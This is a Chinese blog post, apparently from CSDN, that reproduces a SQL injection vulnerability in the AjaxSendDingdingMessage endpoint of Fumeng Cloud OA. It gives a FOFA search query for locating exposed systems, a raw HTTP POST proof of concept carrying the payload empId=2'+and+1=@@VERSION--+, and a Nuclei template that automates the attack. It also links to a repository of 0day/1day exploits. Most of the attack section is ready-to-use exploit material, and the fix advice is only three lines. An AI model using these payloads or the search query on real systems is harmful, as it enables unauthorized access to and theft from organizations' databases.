首页 > 数据库 >【漏洞复现】孚盟云oa AjaxSendDingdingMessage接口 存在sql注入漏洞

【漏洞复现】孚盟云oa AjaxSendDingdingMessage接口 存在sql注入漏洞

时间:2024-09-28 22:20:32浏览次数:9  
标签:孚盟云 zh oa Content 漏洞 SQL 15 AjaxSendDingdingMessage


》》》产品描述《《《

        孚盟与阿里强强联手将最受青睐的经典C系列产品打造成全新的孚盟云产品,让用户可以用云模式实现信息化管理,让用户的异地办公更加流畅,大大降低中小企业在信息化上成本,用最小的投入享受大型企业级别的信息化服务,使中小企业在网络硬件环境、内部贸易过程管理与快速通关形成一套完整解决方案。


》》》漏洞描述《《《

   Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。


》》》搜索语句《《《

body="hidLicResult" && body="hidProductID"


》》》漏洞复现《《《

POC

POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Requested-With: XMLHttpRequest
Content-Length: 51

action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+

yaml

id: 孚盟云oa AjaxSendDingdingMessage sql注入漏洞

info:
  name: Potential SQL Injection in Dingding Message Endpoint
  author: Kelichen
  severity: high
  description: |
    Potential SQL Injection vulnerability in the Dingding Message Endpoint.
    This template attempts to exploit the vulnerability by injecting a SQL payload.
  reference:
    - 

http:
  - raw:
      - |
        POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        X-Requested-With: XMLHttpRequest
        Content-Length: 51

        action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "Microsoft SQL Server"
          - "MySQL"
          - "PostgreSQL"
          - "Oracle"
        part: body

》》》修复建议《《《

如非必要,禁止公网访问该系统

通过防火墙等安全设备设置访问策略,设置白名单访问。

升级产品到最新版本


-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

标签:孚盟云,zh,oa,Content,漏洞,SQL,15,AjaxSendDingdingMessage
From: https://blog.csdn.net/qq_48368964/article/details/142616458

相关文章

  • [使用目前最新版]HybridCLR6.9.0+YooAsset2.2.4实现纯C# Unity热更新方案 (一)
    1.前言什么是热更新游戏或者软件更新时,无需重新下载客户端进行安装,而是在应用程序启动的情况下,在内部进行资源或者代码更新Unity目前常用热更新解决方案HybridCLR,Xlua,ILRuntime等Unity目前常用资源管理解决方案AssetBundles,Addressable,YooAsset等在这里我们采用HybridCLR......
  • 237 Sending a Http Request to Store Coach Data(加入后端)
    步骤1、准备后端程序后端程序使用ASP.NETWebAPI编写,见如下源码链接中“237-CoachWebAPI”文件夹黄健华/Vue3用VS2022打开后,需要做如下操作:1)appsettings.json文件中的数据库连接字符串改成自己的(需要新建数据库);2)执行Update-DataBase命令;如下两个专栏可以帮助大家学......
  • 「漏洞复现」誉龙视音频综合管理平台 RelMedia/FindById SQL注入漏洞
    0x01 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需......
  • 挖漏洞经验分享,挖漏洞赚取生活费,7天收益近2200,教你从零基础挖漏洞的正确姿势!
    经常有小伙伴问我。为什么自己总是挖不到漏洞呢?渗透到底是什么样的流程呢?所以全网最详细的渗透测试流程来了!!!全篇文章内容较长,请耐心观看!渗透测试渗透测试其实就是通过一些手段来找到网站,APP,网络服务,软件,服务器等网络设备和应用的漏洞,告诉管理员有哪些漏洞,怎么......
  • springFactoriesLoader作用是读取配置文件
    `SpringFactoriesLoader`是Spring框架中的一个类,用于从`META-INF/spring.factories`文件中加载配置。这是一个非常强大的机制,使得Spring能够通过查找类路径上的配置文件,动态地发现和加载特定的组件或服务。在Spring自动注入(自动配置)中,`SpringFactoriesLoader`起到了以......
  • 复现最新cups-browsed漏洞
    复现最新cups-browsed漏洞https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8#advisory-comment-109538目前复现程度只达到用github的poc启动打印机服务,然后手动添加这个打印机,添加之后使用这个伪造的打印机去打印东西就会执行特定命令(我这......
  • 【云原生安全篇】Trivy助力离线Harbor漏洞扫描实践
    【云原生安全篇】Trivy助力离线Harbor漏洞扫描实践目录1概念1.1为什么需要离线漏洞扫描1.2Trivy和Harbor简介1.3实现离线漏洞扫描的技术方案2实践:Trivy为Harbor提供离线漏洞扫描2.1环境准备2.2安装Trivy作为数据库离线包下载代理2.2.1通过包管理工具安装2.2......
  • 使用 LoadBalancerClient 和 @LoadBalanced 注解需要注意的事项
    使用LoadBalancerClient负责均衡客户端时:情况一:@BeanpublicRestTemplaterestTemplate(){returnnewRestTemplate();}@RestControllerpublicclassConsumerController{@AutowiredprivateRestTemplaterestTemplate;@Autowired......
  • 02 loads 使用最多
    importjson#反序列化,将json格式的字符串转换成python的数据类型v2='["alex",123]'#json格式是一个字符串#print(type(v2))v3=json.loads(v2)#由json字符串转换成列表print(v3,type(v3))>load会进行两件事,>>第一、找到文件,进行打开文件>>......
  • go panic interface conversion interface {} is float64, not int
    packagemainimport( "encoding/json" "log")typeStudentstruct{ Sexstring`json:"sex"` Ageint`json:"age"`}funcmain(){ s1:=&Student{ Sex:"s1", Age:20, } str1,err:=json.Ma......